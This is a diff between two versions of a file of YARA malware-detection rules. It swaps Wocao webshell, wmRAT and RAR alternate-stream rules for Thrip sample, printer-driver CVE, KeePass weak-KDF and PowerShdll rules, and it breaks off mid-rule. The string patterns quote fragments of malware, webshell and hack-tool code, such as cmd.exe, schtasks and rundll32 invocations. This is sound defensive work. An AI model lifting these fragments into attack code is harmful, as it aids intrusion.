+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_12 : FILE
 {
 	meta:
-		description = "Strings from the console.jsp webshell"
-		author = "Fox-IT SRT"
-		id = "1afdfc34-d2e3-58c7-80ea-ee5632e42469"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "b24b8042-b6a3-5af8-9fcf-6d042bdb9524"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L318-L335"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L212-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e70c15ef10b63a011edbcedc773a8e2917fd915c3ecc273c3bf2b78eb10fc570"
+		logic_hash = "49357a34f3b1d0bb86d1c6ddfa6a6c3b92bfafaebd050d835c0a902199a2121b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "33c01d3266fe6a70e8785efaf10208f869ae58a17fd9cdb2c6995324c9a01062"
 
 	strings:
-		$a = "String strLogo = request.getParameter(\"image\")"
-		$b = "!strLogo.equals(\"web.gif\")"
-		$c = "<font color=red>Save Failed!</font>"
-		$d = "<font color=red>Save Success!</font>"
-		$e = "Save path:<br><input type=text"
-		$f = "if (newfile.exists() && newfile.length()>0) { out.println"
+		$s1 = "pGlobal->nOSType==64--%s\\cmd.exe %s" fullword ascii
+		$s2 = "httpcom.log" fullword ascii
+		$s3 = "\\CryptBase.dll" ascii
+		$s4 = "gupdate.exe" fullword ascii
+		$s5 = "wusa.exe" fullword ascii
+		$s6 = " %s %s /quiet /extract:%s\\%s\\" ascii
+		$s7 = "%s%s.dll.cab" fullword ascii
+		$s8 = "/c %s\\%s\\%s%s %s" fullword ascii
+		$s9 = "ReleaseEvildll" fullword ascii
+		$s0 = "%s\\%s\\%s%s" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 6 of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Index_Jsp
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_13 : FILE
 {
 	meta:
-		description = "Strings from the index.jsp socket tunnel"
-		author = "Fox-IT SRT"
-		id = "9c226ccd-6c69-523c-bca4-371e55274667"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "e6aec6f3-2024-5fb2-b37a-77a182684d32"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L337-L353"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L236-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "870dad9fb5456f8edbd9f3c2d0b8764cf1143399626ce4df53c93919bcb1a0cb"
+		logic_hash = "3c319a3ca78687cd2af77d97b4b4a8e72dadd812bf3da2145a23df278c3aa9a2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "780620521c92aab3d592b3dc149cbf58751ea285cfdaa50510002b441796b312"
 
 	strings:
-		$x1 = "X-CMD"
-		$x2 = "X-STATUS"
-		$x3 = "X-TARGET"
-		$x4 = "X-ERROR"
-		$a = "out.print(\"All seems fine.\");"
+		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
+		$s2 = "<member><name>password</name>" fullword ascii
+		$s3 = "<value><string>qqtorspy</string></value>" fullword ascii
+		$s4 = "SOFTWARE\\QKitTORSPY" fullword wide
+		$s5 = "ipecho.net" fullword ascii
 
 	condition:
-		all of ( $x* ) and $a
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3dfad33b2fb66c083c99dc10341908b7" or 4 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Ver_Jsp
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_14 : FILE
 {
 	meta:
-		description = "Strings from the ver.jsp webshell"
-		author = "Fox-IT SRT"
-		id = "b2828b84-8934-5111-9345-683a07025070"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "736e2700-cdcb-5165-b786-67edaef765b6"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L355-L372"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L256-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ada6de4b07a76e79bb17793cda2b51f96554a35992a73f59c360487638ae3be3"
+		logic_hash = "c96a40495bc2a17a6215c877ad054bd2e1e10c524c2d54da1955d370b9ccdcd7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "67dd44a8fbf6de94c4589cf08aa5757b785b26e49e29488e9748189e13d90fb3"
 
 	strings:
-		$a = "String strLogo = request.getParameter(\"id\")"
-		$b = "!strLogo.equals(\"256\")"
-		$c = "boolean chkos = msg.startsWith"
-		$d = "while((c = er.read()) != -1)"
-		$e = "out.print((char)c);}in.close()"
-		$f = "out.print((char)c);}er.close()"
+		$s1 = "%SystemRoot%\\System32\\svchost.exe -k " fullword ascii
+		$s2 = "spdirs.dll" fullword ascii
+		$s3 = "Provides storm installation services such as Publish, and Remove." fullword ascii
+		$s4 = "RegSetValueEx(Svchost\\netsvcs)" fullword ascii
+		$s5 = "Load %s Error" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "InstallA" ) and pe.exports ( "InstallB" ) and pe.exports ( "InstallC" ) ) or all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Webinfo
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_15 : FILE
 {
 	meta:
-		description = "Generic strings from webinfo.war webshells"
-		author = "Fox-IT SRT"
-		id = "b8477f62-f3f6-5526-b0e3-9b794fefaa1f"
-		date = "2023-12-05"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd8aa404-4c12-5c8f-a952-a143da858b9b"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L374-L394"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L278-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "711737a56067f24f422cc7d5aeba4389741fe18a0e66f2715fce626c3b6aef19"
+		logic_hash = "22769d215e52965f48eb3455b39fbd8f8ce950a67f8132612d42b78fde9822a5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "231c569f11460a12b171f131c40a6f25d8416954b35c28ae184aba8a649d9786"
 
 	strings:
-		$var1 = "String strLogo = request.getParameter"
-		$var2 = "String content = request.getParameter(\"content\");"
-		$var3 = "String basePath=request.getScheme()"
-		$var4 = "!strLogo.equals("
-		$var5 = "if(path!=null && !path.equals(\"\") && content!=null"
-		$var6 = "File newfile=new File(path);"
-		$str1 = "Save Success!"
-		$str2 = "Save Failed!"
+		$s1 = "%s\\cmd.exe /c %s" fullword ascii
+		$s2 = "CryptBase.dll" fullword ascii
+		$s3 = "gupdate.exe" fullword ascii
+		$s4 = "wusa.exe" fullword ascii
+		$s5 = " %s %s /quiet /extract:%s\\%s\\" ascii
+		$s6 = "%s%s.dll.cab" fullword ascii
+		$s7 = "%s\\%s\\%s%s %s" fullword ascii
+		$s8 = "%s\\%s\\%s%s" fullword ascii
 
 	condition:
-		2 of ( $var* ) or ( all of ( $str* ) and 1 of ( $var* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6ec70a295000ab0a753aa708e9439b4" or 6 of them )
 }
-rule SIGNATURE_BASE_APT_IN_TA397_Wmrat : HUNTING
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_16 : FILE
 {
 	meta:
-		description = "track wmRAT based on socket usage, odd error handling, and reused strings"
-		author = "Proofpoint"
-		id = "c5855b30-3e75-570f-b327-498dfc382159"
-		date = "2024-11-20"
-		modified = "2025-01-17"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta397_dec24.yar#L2-L80"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "58be9a1b-2228-5d7a-97c9-198cacbe1a66"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L301-L317"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3bf4bbd5564f4381820fb8da5810bd4d9718b5c80a7e8f055961007c6f30da2b"
-		hash = "3e9a08972b8ec9c2e64eeb46ce1db92ae3c40bc8de48d278ba4d436fc3c8b3a4"
-		hash = "40ddb4463be9d8131f363fd78e21d9de5d838a3ec4044526aea45a473d6ddd61"
-		hash = "4836cb7eed0b20da50acb26472f918b180917101c026ce36074e0e879b604308"
-		hash = "4e3e4d476810c95c34b6f2aa9c735f8e57e85e3b7a97c709adc5d6ee4a5f6ccc"
-		hash = "5ab76cf85ade810b7ae449e3dff8a19a018174ced45d37062c86568d9b7633f9"
-		hash = "811741d9df51a9f16272a64ec7eb8ff12f8f26794368b1ff4ad5d30a1f4bb42a"
-		hash = "b588a423b826b57dce72c9ab58f89be2ddc710a0367ed0eed001c047d8bef32a"
-		hash = "caf871247b7256945598816e9c5461d64b6bdb68a15ff9f8742ca31dc00865f8"
-		logic_hash = "b20a13b87f4b81e7ebc10ff2f6203aeab46980e0d481bad786695339dd59bf7a"
+		logic_hash = "950ece29e8fd056e3506684bce9b16eb185d63c1b020e4911972f5fcbdadbe30"
 		score = 75
 		quality = 85
-		tags = "HUNTING"
-		category = "hunting"
-		malfamily = "wmRAT"
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b1c1c6d82837dbbccd171a0413c1d761b1f7c3668a21c63ca06143e731f030e"
 
 	strings:
-		$code_sleep_loop = {
-            6a 64              // push    0x64
-            ff d6              // call    esi
-            6a 01              // push    0x1
-            e8 ?? ?? ?? ??     // call    operator new
-            83 c4 04           // add     esp, 0x4
-            3b c7              // cmp     eax, edi
-
-        }
-		$code_error_handling = {
-            88 19           // mov     byte [ecx], bl
-            4a              // dec     edx
-            41              // inc     ecx
-            47              // inc     edi
-            4e              // dec     esi
-            85 d2           // test    edx, edx
-            ?? ??           // jne     0x401070
-            5f              // pop     edi {__saved_edi}
-            49              // dec     ecx
-            5e              // pop     esi {__saved_esi}
-            b8 7a 00 07 80  // mov     eax, 0x8007007a
-
-        }
-		$code_socket_recv_parsing = {
-            // 8b 15 20 55 41 00   mov     edx, dword [data_415520]
-            6a 00              // push    0x0
-            b8 04 00 00 00     // mov     eax, 0x4
-            2b c6              // sub     eax, esi
-            50                 // push    eax {var_10_1}
-            8d 0c 3e           // lea     ecx, [esi+edi]
-            51                 // push    ecx {var_14_1}
-            52                 // push    edx {var_18_1}
-            ff ??              // call    ebx
-            83 f8 ff           // cmp     eax, 0xffffffff
-            ?? ??              // je      0x4082e3
-            03 f0              // add     esi, eax
-            83 fe 04           // cmp     esi, 0x4
-          }
-		$str1 = "-.-.-." ascii
-		$str2 = "PATH" ascii
-		$str3 = "Path=" ascii
-		$str4 = "https://microsoft.com" ascii
-		$str5 = "%s%ld M" ascii
-		$str6 = "%s%ld K" ascii
-		$str7 = "%s(%ld)" ascii
-		$str8 = "RFOX" ascii
-		$str9 = "1llll" ascii
-		$str10 = "%d result(s)" ascii
-		$str11 = "%s%ld MB" ascii
-		$str12 = "%s%ld KB" ascii
-		$str13 = "%.1f" ascii
-		$str14 = "%02d-%02d-%d %02d:%02d" ascii
+		$s1 = "[%d] Failed, %08X" fullword ascii
+		$s2 = "woqunimalegebi" fullword ascii
+		$s3 = "[%d] Offset can not fetched." fullword ascii
 
 	condition:
-		uint16be( 0x0 ) == 0x4d5a and ( 2 of ( $code* ) or 10 of ( $str* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of them or pe.imphash ( ) == "c6a4c95d868a3327a62c9c45f5e15bbf" )
 }
-rule SIGNATURE_BASE_SUSP_RAR_NTFS_ADS : HUNTING FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_17 : FILE
 {
 	meta:
-		description = "Detects RAR archive with NTFS alternate data stream"
-		author = "Proofpoint"
-		id = "ca2b5904-b3d3-53cd-a973-6f30f0831a94"
-		date = "2024-12-17"
-		modified = "2025-01-17"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta397_dec24.yar#L82-L110"
+		description = "Detects sample found in Thrip report by Symantec "
+		author = "Florian Roth (Nextron Systems)"
+		id = "e314a893-1ef5-5d5f-b056-af25765c0b70"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L319-L343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bcca4771e8f940ce8cfcff08284545fec6163df549e1fb589d89ca3fa335f04c"
-		score = 70
-		quality = 83
-		tags = "HUNTING, FILE"
-		category = "hunting"
-		hash1 = "feec47858379c29300d249d1693f68dc085300f493891d1a9d4ea83b8db6e3c3"
-		hash2 = "53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1"
+		logic_hash = "0724e07614e704d9ac8a1ae4aecfcf3d9800dde6f83eeecc8427ab6205e321a6"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05036de73c695f59adf818d3c669c48ce8626139d463b8a7e869d8155e5c0d85"
+		hash2 = "08d8c610e1ec4a02364cb53ba44e3ca5d46e8a177a0ecd50a1ef7b5db252701d"
+		hash3 = "14535607d9a7853f13e8bf63b629e3a19246ed9db6b4d2de2ca85ec7a7bee140"
 
 	strings:
-		$rar_magic = {52 61 72 21}
-		$ads = {
-                 03         // Header Type -> Service Header
-                 23         // Header flags
-                 [17-20]    // Flags and extra data area
-                 00         // Windows
-                 03         // Length of name = STM = 3
-                 53 54 4d   // STM NTFS alternate data stream
-                 [1-2]      // variable int (vint) for size of the stream name -> 1-2 bytes should be enough to take into account
-                 07         // Data type = Service data = Service header data array
-                 3a         // Start of the ADS name -> start with colon ":"
-               }
-		$neg = "Zone.Identifier"
+		$x1 = "c:\\users\\administrator\\desktop\\code\\skeyman2\\" ascii
+		$x2 = "\\SkeyMan2.pdb" ascii
+		$x3 = "\\\\.\\Pnpkb" fullword ascii
+		$s1 = "\\DosDevices\\Pnpkb" wide
+		$s2 = "\\DosDevices\\PnpKb" wide
+		$s3 = "\\Driver\\kbdhid" wide
+		$s4 = "\\Device\\PnpKb" wide
+		$s5 = "Microsoft  Windows Operating System" fullword wide
+		$s6 = "hDevice == INVALID_HANDLE_VALUE" fullword ascii
 
 	condition:
-		$rar_magic at 0 and $ads and not $neg in ( @ads [ 1 ] .. @ads [ 1 ] + 15 )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_RANCOR_JS_Malware : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_18 : FILE
 {
 	meta:
-		description = "Rancor Malware"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "83dd9567-199e-511c-8c9a-96422bd793e7"
-		date = "2018-06-26"
+		id = "20642526-5a4d-5dca-a6f5-29f19a9b5271"
+		date = "2018-06-21"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L13-L28"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L345-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d1e86d4395d4f84518750b5d58d15ed79b79570fbe50010d5d790b4c2511bb2"
+		logic_hash = "5cac313bd77900e67f0528d660671394915dff7159ca6fa067fd9c392d7c269a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458"
+		hash1 = "33029f5364209e05481cfb2a4172c6dc157b0070f51c05dd34485b8e8da6e820"
+		hash2 = "263c01a3b822722dc288a5ac138d953630d8c548a0bee080ae3979b7d364cecb"
+		hash3 = "52d190a8d20b4845551b8765cbd12cfbe04cf23e6812e238e5a5023c34ee9b37"
+		hash4 = "1f019e3c30a02b7b65f7984903af11d561d02b2666cc16463c274a2a0e62145d"
+		hash5 = "43904ea071d4dce62a21c69b8d6efb47bcb24c467c6f6b3a6a6ed6cd2158bfe5"
+		hash6 = "00d9da2b665070d674acdbb7c8f25a01086b7ca39d482d55f08717f7383ee26a"
 
 	strings:
-		$x1 = ",0,0 >%SystemRoot%\\system32\\spool\\drivers\\color\\fb.vbs\",0,0" fullword ascii
-		$x2 = "CreateObject(\"Wscript.Shell\").Run \"explorer.exe \"\"http" ascii
-		$x3 = "CreateObject(\"Wscript.Shell\").Run \"schtasks /create" ascii
+		$s1 = "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key" fullword ascii
+		$s2 = "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard" fullword ascii
+		$s3 = "LoadLibraryA() failed in KbdGetProcAddressByName()" fullword ascii
+		$s5 = "Unknown Virtual-Key Code" fullword ascii
+		$s6 = "Computer Sleep key" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x533c and filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Variant : FILE
+
+rule SIGNATURE_BASE_VULN_Printerdriver_Privesc_CVE_2021_3438_Jul21 : FILE
 {
 	meta:
-		description = "Detects PLAINTEE malware"
+		description = "Detects affected drivers with PE timestamps older than the date of the initial report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5b68079-0517-504d-a45f-f6ced532db82"
-		date = "2018-06-26"
+		id = "34cd648a-3e3f-5832-8abe-18507931eb3d"
+		date = "2021-07-20"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L30-L49"
+		reference = "https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2021_3438_printdriver.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d22aa91d0f66dbb85b79c0f121f0508135bf817929d81f3ff0b3fdf223ba53ec"
-		score = 75
+		logic_hash = "b58c2623c8fb84162c1c9390d0398639061ed5b1d4a8e007685e6fabe42bde54"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31"
-		hash2 = "bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e"
+		hash1 = "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4"
 
 	strings:
-		$s1 = "payload.dat" fullword ascii
-		$s3 = "temp_microsoft_test.txt" fullword ascii
-		$s4 = "reg add %s /v %s /t REG_SZ /d \"%s\"" fullword ascii
-		$s6 = "%s %s,helloworld2" fullword ascii
-		$s9 = "%s \\\"%s\\\",helloworld" fullword ascii
-		$s16 = "recv plugin type %s size:%d" fullword ascii
+		$s1 = "This String is from Device Driver@@@@@ !!!" ascii
+		$s2 = "\\DosDevices\\ssportc" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $s* ) and 1613606400 >= pe.timestamp
 }
-
-rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Malware_Exports : FILE
+rule SIGNATURE_BASE_VULN_Keepass_DB_Brute_Forcible : FILE
 {
 	meta:
-		description = "Detects PLAINTEE malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fa1e678d-8357-522b-9167-31321ab7753f"
-		date = "2018-06-26"
+		description = "Detects KeePass .kdbx password stores, which could be brute forced to steal the credentials. With AES-KDF and less than 65536 iterations the cracking speed with a single GPU is 20k/s, for the old default of 6.000 iterations it's 200k/s. Best remediation is to change the key derivative function to Argon2d and delete all older versions of the .kdbx"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1a86e03-b3d1-5abc-9287-a4846451caff"
+		date = "2023-07-20"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L51-L62"
+		reference = "https://keepass.info/help/base/security.html#secdictprotect"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_keepass_brute_forcible.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa55452d4639dbaec760277908906c4ff9e8b66a60b1bcdc157ce23bd5d596db"
-		score = 75
+		logic_hash = "14460f7d4976a3bbd6de2f7cfccfbfec35eb780ab762396a6490669ddde59ce8"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+
+	strings:
+		$keepass_magic = { 03 D9 A2 9A 67 FB 4B B5 }
+		$below_65536_rounds = { 06 08 00 ?? ?? 00 00 00 00 00 00 07 10 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "Add" ) and pe.exports ( "Sub" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+		$keepass_magic at 0 and $below_65536_rounds at 108
 }
-
-rule SIGNATURE_BASE_APT_RANCOR_DDKONG_Malware_Exports : FILE
+rule SIGNATURE_BASE_Powershdll
 {
 	meta:
-		description = "Detects DDKONG malware"
+		description = "Detects hack tool PowerShdll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c94d4ea2-7c16-5003-98ea-253f8a2d01d1"
-		date = "2018-06-26"
+		id = "cc0e01ca-77f0-5665-8b1e-48c8e947d0d3"
+		date = "2017-08-03"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L64-L75"
+		reference = "https://github.com/p3nt4/PowerShdll"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershdll.yar#L9-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d11d46530c22b323c504344448d91fd43c0eecd29cf29aa4da7b2c797d27ff9"
+		logic_hash = "6c93eca642cc29e6ce661e6ea975bc1a88fff4e6a4825c1da3f82b3a6701392a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+		hash1 = "4d33bc7cfa79d7eefc5f7a99f1b052afdb84895a411d7c30045498fd4303898a"
+		hash2 = "f999db9cc3a0719c19f35f0e760f4ce3377b31b756d8cd91bb8270acecd7be7d"
+
+	strings:
+		$x1 = "rundll32 PowerShdll,main -f <path>" fullword wide
+		$x2 = "\\PowerShdll.dll" ascii
+		$x3 = "rundll32 PowerShdll,main <script>" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "ServiceMain" ) and pe.exports ( "Rundll32Call" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_HP_Ilo_Firmware_Dec21_1 : FILE
+rule SIGNATURE_BASE_Powershell_Susp_Parameter_Combo : HIGHVOL FILE
 {
 	meta:
-		description = "Detects suspicios ELF files with sections as described in malicious iLO Board analysis by AmnPardaz in December 2021"
+		description = "Detects PowerShell invocation with suspicious parameters"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f5fa905-07a3-55da-b644-c5ab882b4a9d"
-		date = "2021-12-28"
-		modified = "2023-12-05"
-		reference = "https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ilo_board_elf.yar#L2-L18"
+		id = "17c707f3-7f51-5772-9874-a96c220960a7"
+		date = "2017-03-12"
+		modified = "2022-09-15"
+		reference = "https://goo.gl/uAic1X"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_invocation.yar#L2-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e959d07d864a485b8cc7765f9e12869ff34747ab552e26244eb28f510d1051f"
-		score = 80
-		quality = 85
-		tags = "FILE"
